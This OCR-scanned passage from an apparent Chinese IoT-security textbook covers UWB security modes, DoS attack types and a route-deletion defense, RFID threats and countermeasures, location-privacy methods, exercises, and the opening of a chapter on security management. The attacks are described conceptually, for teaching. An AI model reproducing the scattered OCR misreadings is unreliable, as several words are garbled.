准 化 组 织 接受 了 由 WiMedia 联盟 提出 的 《高 速率 超 带宽 通信 的 物理 层 和 媒体 介入 控制 标 
准 》, 即 ECMA-367(ISO/IEC 26907) 。 该 标准 规定 了 无 安全 和 强 安全 两 种 安全 级 别 和 3 种 
安全 模式 ,安全 保护 包括 数据 加 密 、 消 息 认 证 和 重 放 攻 击 防护 ,安全 帧 提供 对 数据 帧 、 选 择 帧 
和 控制 帧 的 保护 。3 种 安全 模式 如 下 : 

。 安全 模式 0。 无 安全 模式 ,定义 了 使 用 无 安全 帧 的 通信 方式 。 在 该 模式 下 ,如果 收 到 

安全 帧 ,MAC 层 将 直接 丢弃 该 帧 。 

。 安全 模式 1。 定 义 了 数据 传输 时 与 安全 模式 0 下 的 设备 进行 通信 ,或 者 与 未 建立 安 

全 关系 的 安全 模式 1 下 的 设备 进行 通信 ,或 者 在 特定 帧 的 控制 下 与 建立 安全 关系 的 
安全 模式 1 下 的 设备 进行 通信 ,否则 将 丢弃 数据 。 

。 安全 模式 2。 不 与 其 他 模式 下 的 设备 进行 通信 ,通过 四 次 握手 协议 建立 安全 连接 。 

本 节 将 以 DoS 为 例 ,说 明 UWB 的 防御 机 制 。UWB 中 DoS 的 攻击 类 型 主要 有 两 种 , 即 
MAC 层 攻 击 和 网 络 层 攻击 。 

MAC 层 DoS 攻击 包括 以 下 方法 : 

。 拥塞 目标 设备 使 用 的 UWB 信道 ,使 得 目标 设备 无 法 通信 。 

。 将 目标 设备 作为 中 继 , 使 其 不 间断 转发 无 效 的 数据 帧 , 耗 尽 目标 设备 的 资源 ,使 其 无 

法 使 用 。 

网 络 层 DoS 攻击 主要 是 进行 路 由 攻击 ,主要 方法 如 下 : 

。 攻击 者 向 被 攻击 设备 建立 大 量 的 无 效 TCP 连接 (如 SYN 半 开 连接 ) 来 消耗 其 资源 ， 

阻碍 正常 链接 的 建立 ,从 而 使 得 正常 服务 请 求 被 拒绝 。 

。 攻击 者 向 目标 设备 发 送 伪造 的 路 由 更 新 信息 ,欺骗 目标 设备 进行 路 由 更 新 ,使 其 路 

由 失效 。 
。 进行 IP 地 址 欺骗 。 攻 击 者 向 路 由 器 的 广播 地 址 发 送 虚 假 信息 ,使 路 由 器 所 在 网 络 
的 所 有 设备 向 UWB 网 络 中 的 目标 设备 回应 虚假 信息 。 

。 繁 改 IP 数据 包头 的 TTL 值 , 使 数据 包 因 TTL 快速 降 为 0 而 无 法 到 达 目 标 设备 。 

针对 UWB 中 的 DoS 攻击 ,UWSB 主要 采用 路 由 删除 的 方法 防止 洪 泛 DoS 攻击 。 如 
图 8. 5 所 示 , 当 目标 设备 发 现 某 个 设备 是 攻击 者 时 ,将 生成 一 个 路 由 错误 报 文 (RERR), 报 
文中 标注 目标 设备 不 可 达 , 目 标 设备 将 RRER 发 送 给 攻击 者 。 攻 击 者 收 到 RERR 后 将 认为 
目标 设备 不 可 达 , 因 此 将 其 从 路 由 表 中 删除 ,无 法 继续 进行 攻击 。 如 果 攻 击 者 想 要 重新 建立 
路 由 向 目标 设备 发 送 攻击 报 文 ,目标 设备 对 其 路 由 请 求 (RREQ) 将 不 了 予 回 应 。 通 过 这 种 方 
式 ,只 要 是 被 标记 为 攻击 者 的 设备 就 无 法 建立 路 由 ,从 而 成 功 抵御 了 基于 数据 报 文 的 DoS 
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攻击 。 


(4) 重复 发 送 无 效 报 文 Ce) 
记录 A 为 攻击 者 


() 发 送 RERR， 标 记 B 不 可 达 (5) 


删除 到 达 B 的 路 由 记录 A 为 攻击 者 


(4) 发 送 RREQ (5) 


无 法 建立 路 由 不 予 回应 


x 


图 8.5 路 由 删除 方法 


8.4 小 数据 与 隐私 保护 


8.4.1 小 数据 简介 


小 数据 ,又 称 个 体 资 料 , 是 指 需 要 新 的 应 用 方式 才能 体现 出 具有 高 价值 的 个 体 的 、 高 效 
率 的 ,个 性 化 的 信息 资产 。 更 具体 地 说 ,小 数据 是 通过 各 种 方式 ,如 智能 家 电 、 手 机 \ 平 板 电 
脑 \ 可 穿戴 设备 等 ,收集 用 户 每 时 每 刻 一 举 一 动 产生 的 数据 ,包括 生活 习惯 ,身体 状况 、 社 交 、 
财务 、 喜 好 、 情 绪 , 行 为 等 数据 ,并 通过 数据 处 理 、 分 析 和 融合 技术 ,统一 执行 交换 数据 、 保 护 
隐私 等 多 项 对 外 功能 。 
第 一 个 意识 到 小 数据 重要 性 的 是 美国 康 奈 尔 大 学 的 德 波 哈 尔 。 艾 斯 汀 教授 。 他 在 父亲 
去 世 前 几 个 月 就 注意 到 老人 的 行为 活动 和 平时 不 同一 一 他 不 再 发 送 电子 邮件 ,不 去 超级 市 
场 买 菜 ,到 附近 散步 的 距离 也 越 来 越 短 。 然 而 到 急诊 室 检查 的 时 候 , 不 管 是 测 脉搏 还 是 查 病 
历 , 这 个 90 岁 的 老人 都 没有 表现 出 特别 明显 的 异常 。 可 事实 上 ,如 果 分 析 他 每 时 每 刻 的 个 
体 化 数据 ( 即 小 数据 ) ,就 能 发 现 他 的 生活 其 实 已 经 和 正常 状态 有 了 明显 不 同 。 这 种 针对 个 
体 的 小 数据 带 来 的 生命 健康 的 警示 ,让 艾 斯 汀 教授 认为 小 数据 可 以 看 作 是 一 种 新 的 医学 证 
据 , 并 认为 它 是 “your row of their data”( 意 为 : 大 数据 中 属于 你 的 那 一 行 数据 ) 。 
大 数据 和 小 数据 的 差别 主要 有 以 下 几 点 : 
。 数据 量 不 同 。 大 数据 是 宏观 尺度 上 的 、 只 有 在 大 规模 数据 的 基础 上 才 可 以 做 的 事 
情 。 洛 杉 矶 警察 局 和 加 利 福 尼 亚 大 学 合作 利用 大 数据 预测 犯罪 的 发 生 ,统计 学 家 内 
特 。 西 尔 弗 (Nate Silver) 利 用 大 数据 预测 2012 美国 选举 结果 ,这 些 都 需要 大 量 的 
样本 才能 准确 地 揭示 研究 对 象 的 规律 ,单个 的 犯罪 案件 和 一 两 个 家 庭 的 政治 倾向 都 
无 法 以 偏 概 全 。 相 反 的 ,小 数据 是 微观 尺度 上 的 ,是 仅仅 针对 个 人 的 数据 。 一 般 来 
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说 ,大 数据 是 由 小 数据 汇集 而 成 的 。 
。 服务 对 象 不 同 。 大 数据 主要 是 为 了 揭示 庞大 用 户 群体 的 喜好 、 消 费 \ 行 为 活动 等 规 
律 ,主要 是 为 群体 而 非 个 人 服务 。 而 小 数据 是 以 个 人 为 本 ,记录 和 分 析 的 都 是 个 人 
的 信息 ,一 个 个 体 的 小 数据 仅 对 自己 有 效 ,对 其 他 个 体 并 没有 重大 影响 。 
。 数 据 处 理 方式 不 同 。 大 数据 强调 标准 化 ,只 有 数据 标准 化 ,才能 大 规模 采集 ,以 后 
的 数据 处 理 概 率 统计 才 有 了 可 能 。 小 数据 则 强调 个 性 化 ,为 每 个 人 的 个 人 需求 
服务 。 
小 数据 可 以 很 好 地 解决 大 数据 对 个 人 隐私 的 践踏 和 侵犯 。 小 数据 对 内 是 一 切 个 人 数据 
的 集合 ,对 外 是 个 人 数据 的 唯一 接口 。 个 人 可 以 主动 地 控制 向 大 数据 提供 的 信息 , 既 能 保护 
个 人 隐私 信息 ,也 可 以 向 大 数据 提供 准确 信息 。 
如 图 8. 6 所 示 ,在 全 国 国 民 身 体 素质 普查 中 ,大 数据 关心 的 是 国民 身体 素质 的 统计 值 ， 
而 并 非 每 个 个 体 的 具体 身体 素质 。 但 是 在 传统 的 大 数据 系统 中 (图 8. 6(a)), 个 人 无 法 选择 
向 大 数据 输入 哪些 隐私 信息 ,可 能 会 造成 用 户 隐 私 泄露 。 而 如 果 使 用 小 数据 (图 8. 6(b))， 
个 人 可 以 选择 对 外 输出 的 信息 , 仅 在 小 数据 范围 内 对 隐私 信息 进行 处 理 , 而 将 处 理 后 的 结果 
或 决策 等 信息 输出 给 大 数据 。 








国民 体质 普查 国民 体质 普查 






























日 常 
病情 





1/ \ 
,外 数据 小 数据 、、 
(a) 传统 的 大 数据 (b) 大 数据 结合 小 数据 
图 8.6 小 数据 保护 个 人 隐私 


再 如 ,现在 智能 插座 可 以 实时 监控 每 台电 器 的 用 电量 ,政府 和 供电 部 门 可 以 利用 所 有 用 
户 的 电量 使 用 大 数据 分 析 研究 用 电 规律 ,进行 差 时 定价 ,引导 平衡 用 电 。 

但 是 最 近 也 有 研究 表明 ,通过 窃听 用 户 电器 的 用 电量 可 以 推测 出 该 用 户 的 活动 隐私 , 例 
如 ,利用 电视 的 用 电量 甚至 可 以 推测 出 用 户 在 某 时 刻 在 收看 哪个 电视 频道 。 而 使 用 小 数据 ， 
用 户 可 以 仅仅 告诉 大 数据 单个 用 户 的 总 的 用 电量 、 某 个 时 段 的 用 电量 或 自己 的 用 电 需 求 ,就 
可 以 帮助 大 数据 进行 市 场 分 析 和 定价 ,解决 了 大 数据 和 隐私 之 间 的 矛盾 。 
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8.4.2 REFID 功能 


与 个 人 信息 密切 相关 的 小 数据 的 采集 经 常 通过 RFID 进行 , RFID 的 通信 主要 是 以 电 
磁 波 的 形式 进行 ,而 没有 任何 物理 可 见 的 接触 。RFID 系统 很 容易 受到 各 种 攻击 ,其 面临 的 
安全 隐私 威胁 主要 有 以 下 几 种 形式 : 

。 非法 读 取 。 不 经 允许 而 进行 RFID 数据 的 读 取 。 例 如 ,商业 竞争 者 可 通过 未 授权 的 

读 写 器 快速 读 取 超 市 的 商品 标签 数据 ,获取 重要 的 商业 信息 。 

。 位置 跟 踪 。 位 置 隐私 含有 高 度 的 个 人 特征 ,携带 RFID 标签 的 任何 人 都 可 能 在 公共 

场合 被 自动 跟踪 。 

。 人 窟 听 隐 私 。 因 RFID 系统 在 前 向 信道 的 信号 传输 距离 较 远 ,窃听 者 可 轻易 窃取 读 写 

器 发 出 的 信号 数据 ,使 得 个 人 或 组 织 的 信息 隐私 泄露 。 个 人 隐私 包括 个 人 信息 , 例 
如 纳税 ,医疗 或 者 购买 记录 个 人 习惯 等 ; 组 织 隐私 可 能 包括 门禁 系统 的 认证 等 。 

。 拒绝 服务 攻击 。 攻 击 者 使 得 标签 进入 不 能 正常 工作 的 状态 ,其 结果 是 ,标签 变 得 暂 
时 或 永久 失效 。 这 样 的 攻击 常常 由 于 标签 的 移动 特性 而 变 得 越发 严重 ,使 得 标签 易 
于 受到 远 处 隐蔽 读 写 器 的 操纵 。 如 果 不 能 抵抗 这 样 的 攻击 ,那么 使 用 RFID 的 商店 
就 会 失窃 。 

。 伪装 欺骗 和 克隆 攻击 。 通 过 伪装 成 合法 标签 ,欺骗 读 写 器 为 其 提供 数据 。 这 种 攻击 
还 包括 非 授 权 的 标签 复制 , 它 是 一 种 完整 性 攻击 ,攻击 者 成 功 地 截获 标签 的 辨认 信 
息 后 就 能 实现 。 同 样 , 由 于 伪装 的 标签 能 够 被 读 写 器 读 取 而 使 得 问题 更 严重 。 攻 击 
者 能 够 复制 标签 将 使 得 防伪 保护 失效 ,接着 就 能 实施 偷窃。 而 对 于 使 用 RFID 标签 
进行 自动 化 安全 验证 的 公司 ,这 将 是 一 个 新 的 易 受 到 攻击 的 弱点 。 

。 重 放 攻 击 。 这 也 是 一 种 完整 性 攻击 ,攻击 者 使 用 伪造 的 读 写 器 ,事先 截获 某 目 标 标 

签 的 应 答 ( 由 标签 发 给 读 写 器 的 信息 ), 此 后 模拟 该 标签 的 应 答 发 送 给 合法 的 读 写 
器 ,由 此 模拟 一 个 合法 的 标签 。 对 于 使 用 非 接触 式 身 份 认证 卡 的 RFID 系统 环境 ， 
这 提供 了 一 种 非法 进入 受 保护 区 域 的 手段 。 

另外 ,RFID 作为 物 联网 的 核心 之 一 ,除了 用 于 个 人 小 数据 采集 之 外 ,还 广泛 用 于 采购 
与 分 配 .商业 贸易 .生产 制造 物流、 防盗 以 及 军事 用 途上 。 可 以 设想 ,如 果 RFID 系统 受到 
攻击 ,也 许 就 会 出 现 工厂 停产 ,社会 秩序 混乱 ,甚至 直接 威胁 人 类 的 生命 安全 。 因 此 ,安全 和 
隐私 保护 将 成 为 制约 RFID 系统 大 规模 应 用 的 瓶颈 问题 ,也 成 为 其 设计 .部署 与 应 用 中 的 一 
项 关键 性 支撑 技术 。 

一 般 说 来 ,一 个 安全 的 RFID 系统 都 应 该 解决 3 个 安全 问题 : 保密 性 、 信 息 泄 露 和 可 追 
踪 性 。 当 前 ,实现 RFID 安全 性 机 制 所 采用 的 方法 主要 可 以 分 为 物理 方法 、 密 码 机 制 以 及 混 
合 机 制 。 

1. 物理 方法 

物理 方法 主要 用 于 一 些 难 以 采用 复杂 密码 机 制 的 低 成 本 标签 中 ,主要 包括 以 下 几 种 
方法 。 

1) Kill 命令 机 制 

其 原理 是 从 物理 上 毁坏 标签 ,从 而 阻止 对 标签 及 其 携带 物 的 跟踪 。 如 在 超市 结账 后 收 
银 员 即 对 商品 上 的 标签 进行 Kill 处 理 。 但 是 Kill 识别 序列 号 (PIN) 一 旦 泄露 ,可 能 导致 不 
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法 分 子 恶意 杀 死 标签 ,实现 对 超市 商品 的 盗窃 。 

2) 静电 屏蔽 

可 以 对 标签 进行 屏蔽 ,使 之 不 能 接收 任何 来 自 读 写 器 的 信号 。 但 是 静电 屏蔽 需要 一 个 
额外 的 物理 设备 , 既 造 成 了 不 便 , 也 增加 了 系统 的 成 本 。 

3) 主动 干扰 

标签 用 户 可 以 通过 一 个 设备 主动 广播 无 线 电 信号 来 阻止 或 破坏 附近 的 RFID 阅读 器 的 
操作 。 但 这 种 方法 可 能 导致 非法 干扰 ,使 附近 其 他 合法 的 RFID 系统 和 无 线 系统 受到 干扰 。 

4) 阻止 标签 

该 方法 需要 一 个 额外 的 、 特 殊 的 标签 ,通过 该 标签 干扰 防 碰 撞 算 法 来 实现 保护 ,使 得 读 
写 器 读 取 命 令 每 次 总 是 获得 相同 的 应 答 数据 ,从 而 保护 标签 。 

2. 密码 机 制 

密码 机 制 主要 包括 以 下 几 种 方法 。 

1) Hash 锁 协 议 

阅读 器 存储 每 个 标签 的 访问 密 钥 ,对 应 标签 存储 的 元 身份 (MetaID) ,其 中 MetalD = 
Hash(K)。 过 程 如 下 : 

(1) 阅读 器 请 求 访问 标签 。 

(2) 标签 发 送 MetaID 给 阅读 器 。 

(3) 阅读 器 查询 获得 与 标签 MetalD 对 应 的 密 钥 K ,并 发 送 给 标签 。 

(4) 标签 检查 Hash(K) 是 否 与 MetaID 相同 ,相同 则 解锁 ,发 送 标签 真实 ID 给 阅读 器 。 

该 方案 的 扩展 有 随机 Hash 锁 协 议和 Hash 链 协议 。 前 者 与 Hash 锁 的 不 同 在 于 阅读 
器 每 次 访问 标签 的 输出 信息 都 不 同 ; 后 者 为 了 解决 可 跟踪 性 ,标签 使 用 了 一 个 Hash 函数 
在 每 次 阅读 器 访问 后 自动 更 新 标识 符 ,实现 前 向 安全 性 。 

2) 匿名 ID 方案 

该 方案 的 目标 是 : 使 得 隐私 侵犯 者 即使 在 消息 传递 过 程 中 截获 标签 信息 也 不 能 获得 标 
签 的 真实 ID。 该 方案 通过 第 三 方 数据 加 密 装 置 , 采 用 公 钥 加 密 、 私 钥 加 密 或 者 添加 随机 数 
生成 匿名 标签 ID。 

虽然 标签 信息 只 需要 采用 随机 读 取 存储 器 (RAM) 存 储 , 成 本 较 低 , 但 数据 加 密 装置 与 
高 级 加 密 算法 都 将 导致 系统 的 成 本 增加 。 

因 标 签 ID 加 密 以 后 仍然 具有 固定 的 输出 ,因此 ,安全 性 也 需要 考虑 。 

3) 再 次 加 密 方案 

该 方案 采用 公 钥 ,标签 可 以 再 次 加 密 。 在 用 户 请 求 下 通过 第 三 方 数据 加 密 装 置 定期 对 
标签 数据 进行 重 写 。 

公 钥 加 密会 带 来 大 量 的 计算 负载 ,因此 通常 由 阅读 器 处 理 。 该 方案 的 最 大 缺陷 是 标签 
的 数据 必须 经 常 重 写 ,同时 也 会 导致 系统 成 本 的 增加 ,使 得 大 规模 的 应 用 受到 限制 。 

3. 混合 机 制 

物理 方法 和 密码 机 制 也 可 以 联合 使 用 ,以 实现 更 高 的 安全 性 。 

除了 这 些 安全 机 制 的 研究 , RFID 安全 问题 还 需要 政策 的 引导 和 保护 。2002 年 
Garfinkel 提出 了 一 个 RFID 权利 法 案 , 指 明了 RFID 系统 创建 和 部 署 的 五 大 基本 原则 , 即 
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RFID 标签 产品 的 用 户 应 具有 如 下 权利 : 

。 有 权 知 道 产品 是 否 包含 RFID 标签 。 

。 有 权 在 购买 产品 时 移 除 嵌 入 的 RFID 标签 ,使 其 失效 或 将 其 摧毁 。 

。 有 权 对 RFID 做 最 好 的 选择 ,如 果 消 费 者 决定 不 选择 RFID 或 启用 RFID 的 Kil 功 
能 ,消费 者 不 应 丧失 其 他 权利 。 

。 有 权 知 道 他 们 的 RFID 标签 内 存储 了 什么 信息 ,如 果 信 息 不 正确 , 则 有 方法 进行 纠 
正 或 修改 。 

。 有 权 知 道 何 时 、 何 地 为 什么 RFID 标签 被 阅读 或 修改 。 


8.4.3 和 群 组 认证 


为 保护 接 人 物 联网 的 实体 的 隐私 和 安全 ,必须 对 接 人 方 进 行 网 络 认 证 。 网 络 认 证 主要 
包括 身份 认证 和 消息 认证 。 

。 身份 认证 。 网 络 认证 中 ,通信 双方 确认 对 方 的 身份 并 交换 会 话 密 钥 。 用 户 标识 和 会 

话 密 钥 都 以 密 文 的 方式 传送 。 如 果 攻 击 者 不 知道 密 钥 ,就 无 法 窃取 会 话 。 但 是 身份 
认证 容易 受到 重 放 攻击 的 威胁 。 

。 消息 认证 。 主 要 是 接收 方 希望 保障 其 接收 到 的 数据 确实 来 自 真正 的 发 送 端 。 

群 组 认证 ,又 称 为 广播 认证 ,是 消息 认证 的 一 种 特殊 方式 , 即 一 方 广播 的 消息 被 多 方 认 
证 。 在 物 联 网 中 ,一 个 网 络 中 可 能 存在 大 量 的 设备 ,因此 广播 认证 相对 于 单 播 认证 是 一 种 更 
为 高 效 的 认证 方法 。 基 站 可 以 采用 广播 的 方式 查询 各 个 设备 ,设备 收 到 广播 包 后 ,对 来 源 进 
行 认证 ,通过 认证 后 再 进行 反馈 。 

群 组 认证 有 两 种 方式 : 

。 采 用 对 称 密 钥 ,要 求全 网 设备 共享 一 个 认证 密 钥 。 采 用 这 种 方式 时 , 任 一 个 设备 汇 

露 了 密 钥 都 会 导致 整个 网 络 的 暴露 ,安全 性 较 差 。 
。 传统 的 群 组 认证 通常 采用 非 对 称 密 钥 , 即 接收 设备 会 根据 发 送 设备 的 数字 签名 使 用 
公 钥 进行 验证 。 这 种 方式 安全 性 更 高 ,但 是 也 会 带 来 签名 和 验证 的 开销 。 

在 物 联网 的 认证 过 程 中 ,无 线 传感器 网 络 的 认证 机 制 是 其 重要 的 内 容 之 一 ,通常 基于 
TESLA 协议 对 使 用 单项 散 列 函数 的 广播 认证 进行 改进 。 下 面 以 uTESLA 为 例 具体 介绍 物 
联网 中 的 认证 机 制 。 

uTESLA 是 一 种 基于 对 称 密 钥 技术 的 轻 量 级 广播 认证 机 制 。 基 站 在 发 送 广播 认证 包 
时 ,使 用 当前 时 刻 的 密 钥 计算 该 包 的 MAC。 当 网 络 中 的 某 设 备 收 到 该 认证 包 后 存储 该 包 ， 
并 等 待 基站 发 送 验证 MAC 的 密 钥 。 之 后 基站 广播 验证 MAC 的 认证 密 钥 给 所 有 的 接收 设 
备 , 接 收 设备 收 到 该 密 钥 之 后 , 即 可 验证 缓存 的 认证 包 是 否 正确 。 该 机 制 需要 基站 和 接收 设 
备 之 间 保 持 时 间 同 步 。 


8.4.4 隐私 保护 


隐私 是 指 个 人 或 机 构 等 实体 不 愿意 被 其 他 人 或 机 构 知 道 的 信息 ,包括 个 人 的 薪水 、 患 病 
情况 ,消费 记录 ,活动 轨迹 、 公 司 的 财务 情况 等 。 但 是 , 随 着 网 络 的 繁荣 和 各 种 数据 挖掘 技术 
的 发 展 ,隐私 泄露 问题 已 经 成 为 严重 的 问题 。 

相信 每 个 人 都 有 这 样 的 经 历 . 用 户 在 网 上 购物 之 后 ,会 留 下 自己 的 购物 痕迹 \ 快 递 地 址 、 
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联系 电话 等 隐私 信息 。 当 用 户 再 浏览 其 他 网 站 时 ,出 现 的 广告 很 可 能 与 已 购 商 品 相 关 。 当 
你 在 一 个 家 房屋 中 介 公 司 登记 注册 之 后 ,所 有 的 中 介 公 司 都 会 给 你 打 电 话 询问 是 否 需 要 服 
务 。 在 影视 作品 中 ,我 们 也 经 常见 到 通过 手机 跟踪 位 置 、 窃 听 通 话 的 场景 。 
隐私 保护 技术 可 以 分 为 3 类 : 
。 数 据 失真 。 在 保持 某 些 数据 或 属性 不 变 的 同时 ,加 入 干扰 信号 使 隐私 数据 失真 。 微 
信 应 用 中 的 “寻找 附近 的 人 ”等 基于 位 置 的 功能 就 采用 了 这 种 方法 。 当 设备 A 通过 
微 信 找 到 附近 的 设备 B 时 ,无 法 获得 B 的 精确 位 置 。 为 了 保护 个 人 隐私 , 微 信 应 用 
在 B 的 精确 位 置 上 加 入 干扰 噪声 ,使 得 A 获得 的 位 置 与 B 的 真实 位 置 有 数 十 米 的 
误差 。 这 个 干扰 噪声 在 不 透露 B 的 准确 位 置 的 同时 ,也 必须 保证 B 一 定位 于 A 的 
搜索 范围 内 ,而 非 千 里 之 外 。 数 据 失真 的 方法 效率 较 高 ,但 是 也 损失 了 一 定 的 数据 
准确 度 。 
数据 加 密 。 采 用 加 密 技术 在 数据 挖掘 过 程 中 隐藏 敏感 数据 ,这 种 方法 经 常用 在 安全 
多 方 计算 等 分 布 式 应 用 场景 中 。 数 据 加 密 可 以 保障 数据 的 准确 度 ,但 是 计算 开销 较 
大 ,可 能 无 法 在 资源 受 限 的 低 成 本 设备 上 使 用 。 
限制 发 布 。 根 据 具体 情况 进行 有 条 件 的 发 布 数据 ,对 数据 进行 泛 化 ,或 是 仅仅 发 布 
数据 中 的 某 几 个 域 。 限 制 发 布 可 以 保障 数据 的 真实 性 ,但 是 也 有 一 定 的 数据 损失 。 
下 面 以 位 置 隐私 信息 为 例 来 说 明 物 联网 中 针对 位 置 隐私 的 具体 保护 方法 。 假 设 用 户 打 
开 “ 大 众 点 评 ”APP, 寻 找 最 近 的 医院 ,用 户 希 望 只 有 自己 知道 准确 的 位 置 ,而 APP 服务 商 和 
攻击 者 都 无 法 获知 自己 的 真实 位 置 。 此 时 主要 有 3 种 防御 方法 : 
。 假 位 置 。 如 图 8. 7(a) 所 示 , 用 户 在 进行 基于 位 置 的 服务 时 ,APP 将 产生 多 个 假 地 
址 。 攻 击 者 在 窃取 地 址 信息 时 无 法 分 辩 真 假 地 址 ,从 而 降低 位 置信 息 泄 露 的 可 
能 性 。 
。 时 空 匿名 。 如 图 8.7(b) 所 示 , 对 位 置信 息 进行 失真 处 理 , 当 用 户 提 出 查询 时 ,只 有 
用 户 自己 可 以 获得 自己 的 精确 位 置 , 然 后 使 用 一 个 区 域 而 非 一 个 精确 地 点 来 表示 用 
户 位 置 。 服 务 商 和 攻击 者 只 能 看 到 扩展 之 后 的 位 置 范围 ,而 无 法 获得 其 具体 位 置 。 
。 空间 加 密 。 对 位 置信 息 进行 加 密 , 由 于 服务 商 和 攻击 者 无 法 获知 用 户 的 加 密 方式 和 
密 钥 ,因此 无 法 计算 出 加 密 前 的 原始 位 置 数据 。 





(a) 假 位 置 (b) 时 空 匿名 





图 8.7 位 置 隐私 保护 方法 


从 该 例 也 可 以 看 出 ,隐私 保护 和 精确 的 个 性 化 服务 是 一 对 矛盾 ,如 何 兼 顾 二 者 将 是 一 个 
巨大 的 挑战 。 同 时 隐私 保护 不 仅 需要 用 户 的 主动 ,也 需要 服务 提供 商 的 配合 。 现 在 常见 的 
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情况 是 : 用 户 只 能 被 动 地 接受 服务 提供 商 的 隐私 保护 条 例 ,无 法 控制 自己 提供 的 数据 以 及 
数据 将 被 用 作 何 种 用 途 。 我 国 已 经 开始 重视 对 隐私 的 保护 ,将 其 作为 一 项 人 格 利益 加 以 保 
护 ,但 是 现在 还 存在 着 很 大 的 不 足 。 隐 私 保护 仍然 需要 高 效 的 技术 保障 和 更 有 力 的 政策 
保护 。 


8.5 本 章 小 结 


本 章 主 要 介绍 了 物 联 网 中 的 安全 隐患 以 及 相应 的 安全 防御 措施 。 物 联网 的 安全 问题 将 
成 为 未 来 社会 新 的 安全 威胁 方向 。 网 络 安全 领域 很 多 典型 防 控 措施 ,如 分 隔 \ 域 .安全 服务 
最 小 化 等 ,已 经 不 能 完全 适应 物 联 网 带 来 的 安全 新 挑战 ,针对 物 联网 的 特征 ,对 有 价值 的 业 
务 进行 精确 管控 和 持续 防护 , 才 是 确保 企业 和 用 户 安 全 的 关键 因素 。 物 联网 的 安全 问题 需 
要 业界 和 用 户 的 重视 ,不 仅 需要 研究 推广 安全 防御 措施 ,也 应 该 同时 积极 推进 安全 防御 标准 
化 。 相 信 未 来 物 联网 安全 性 会 得 到 整体 提升 。 

我 国 在 物 联 网 安全 的 标准 化 上 也 做 出 了 突出 贡献 。 第 二 届 世 界 互联 网 大 会 上 ,中 国 自 
主 研 发 的 一 项 物 联网 安全 关键 技术 TRAIS 已 被 纳入 国际 标准 ,这 是 中 国 在 物 联网 核心 技 
术 RFID 领域 的 首 个 国际 标准 ,是 中 国 科技 企 业 参 与 国际 标准 制定 的 又 一 次 突破 。 


8.6 本 章 习 题 


1. 结合 校园 卡 的 应 用 场景 和 使 用 的 技术 ,思考 这 一 场景 可 能 涉及 的 安全 问题 。 
2. RFID 的 主要 安全 漏洞 和 防御 手段 有 哪些 ? 
3. 在 日 常生 活 中 ,有 哪些 经 常 使 用 的 设备 和 技术 可 能 泄露 个 人 隐私 ? 可 以 采用 什么 措 
施 保护 隐私 ? 
.说明 位 置 服务 和 隐私 保护 的 关系 。 
. 曾 述 什么 是 小 数据 以 及 它 的 重要 性 。 
. 物 联 网 安全 威胁 和 主要 的 攻击 手段 有 哪些 ? 
. 简 述 蓝牙 锁 面临 的 主要 安全 漏洞 。 
. 简 述 重 放 攻 击 的 工作 方式 。 
. 简 述 (高 速率 超 带宽 通信 的 物理 层 和 媒体 介入 控制 标准 ?中 的 3 种 安全 模式 。 
10. 简要 介绍 隐私 保护 技术 的 3 种 方式 。 


oN 
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在 网 络 系统 的 运行 维护 过 程 中 ,很 多 技术 人 员 和 管理 者 往往 过 分 强调 如 何 运用 技术 手 
段 保 证 网 络 系统 的 安全 。 实 际 上 ,网 络 系统 的 安全 性 并 非 仅 依靠 技术 手段 就 能 够 保证 ,还 必 
须 结 合 安全 管理 措施 统筹 兼顾 。 有 效 的 安全 管理 能 够 让 保障 网 络 系统 安全 的 技术 充分 发 挥 
其 应 有 效用 。 安 全 管理 与 安全 技术 并 不 是 相互 独立 的 两 个 方面 ,而 是 在 网 络 系统 安全 保障 
过 程 中 相辅相成 的 两 个 方面 。 基 于 安全 技术 的 管理 和 基于 管理 的 安全 技术 应 用 是 保障 网 络 
系统 安全 可 靠 必 不 可 少 的 两 大 支柱 。 

在 网 络 系统 安全 管理 体系 中 ,首先 需要 明确 安全 管理 的 目标 ,进而 制定 保证 安全 目标 得 以 实 
现 的 安全 管理 策略 和 管理 措施 ,最 后 需要 保证 制定 的 策略 和 措施 能 够 得 到 严格 的 贯彻 和 落实 。 

本 童 主要 内 容 : 

。 安全 目标 

。 安全 方针 政策 

。 安全 评估 与 等 级 保护 

。 安 全 风险 管理 

。 安 全 管理 措施 

。 安 全 防御 系统 的 实施 


9.1 安全 目标 





网 络 系统 对 于 安全 方面 的 基本 要 求 就 是 在 网 络 系统 建设 和 日 常 运行 维护 过 程 中 充分 考 
虑 网 络 传输 的 各 种 风险 ,从 而 确保 网 络 中 运行 的 各 种 应 用 系统 能 够 安全 可 靠 地 和 运行。 本 节 
将 从 安全 目标 的 制定 原则 和 安全 目标 的 分 解 两 个 方面 进行 介绍 讲解 。 


9.1.1 安全 目标 的 制定 原则 


安全 目标 的 制定 原则 如 下 : 

。 可 用 性 。 这 是 安全 目标 制定 过 程 中 首先 需要 考虑 的 要 素 , 即 确保 应 用 系统 有 效 运 转 
并 使 授权 用 户 得 到 所 需 的 信息 服务 。 

。 完整 性 。 包 括 数据 完整 性 和 系统 完整 性 。 数 据 完整 性 主要 是 指 系统 中 的 数据 在 传输 
过 程 中 不 被 非 授 权 方 算 改 ,数据 能 够 原样 传输 到 接收 方 。 系 统 完整 性 主要 是 指 系统 能 
够 正常 运行 ,这 依赖 程序 的 正常 运转 ,而 程序 的 运行 又 与 其 可 执行 文件 直接 相关 。 所 
以 ,系统 完整 性 是 指 系 统 中 可 执行 文件 的 完整 性 , 即 程序 文件 没有 被 非法 修改 。 

”保密 性 。 即 不 向 非 授 权 个 人 和 部 门 暴露 私有 或 者 保密 信息 。 换 而 言 之 ,没有 经 过 授 
权 的 用 户 或 者 部 门 不 能 查看 相关 信息 。 

。 可 审计 性 。 即 系统 能 够 如 实 记录 每 个 实体 的 全 部 行为 ,可 以 为 防止 事后 抵赖 .隔离 
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故障 、 检 测 和 防止 人 侵 ,事后 恢复 和 法 律 诉 讼 提供 支持 。 
。 保 障 性 。 即 提供 并 正确 实现 应 用 系统 的 功能 ,在 用 户 或 者 软件 无 意 中 出 现 差错 时 提 
供 充分 的 保护 ,在 遭受 恶意 的 系统 穿 透 或 者 旁 路 时 提供 充足 的 防护 。 


9.1.2 安全 目标 的 分 解 


在 为 某 一 特定 网 络 系统 制定 安全 目标 时 可 采用 由 上 而 下 逐 级 细 化 的 方式 进行 , 即 先 确 
定 运行 维护 组 织 整体 需要 达到 的 顶层 安全 目标 ,然后 按照 组 织 架 构 逐 层 分 解 项 层 安全 目标 。 
在 分 解 安全 目标 的 过 程 中 必须 保证 下 一 级 安全 目标 严 于 上 一 级 安全 目标 ,这 样 在 实际 运行 
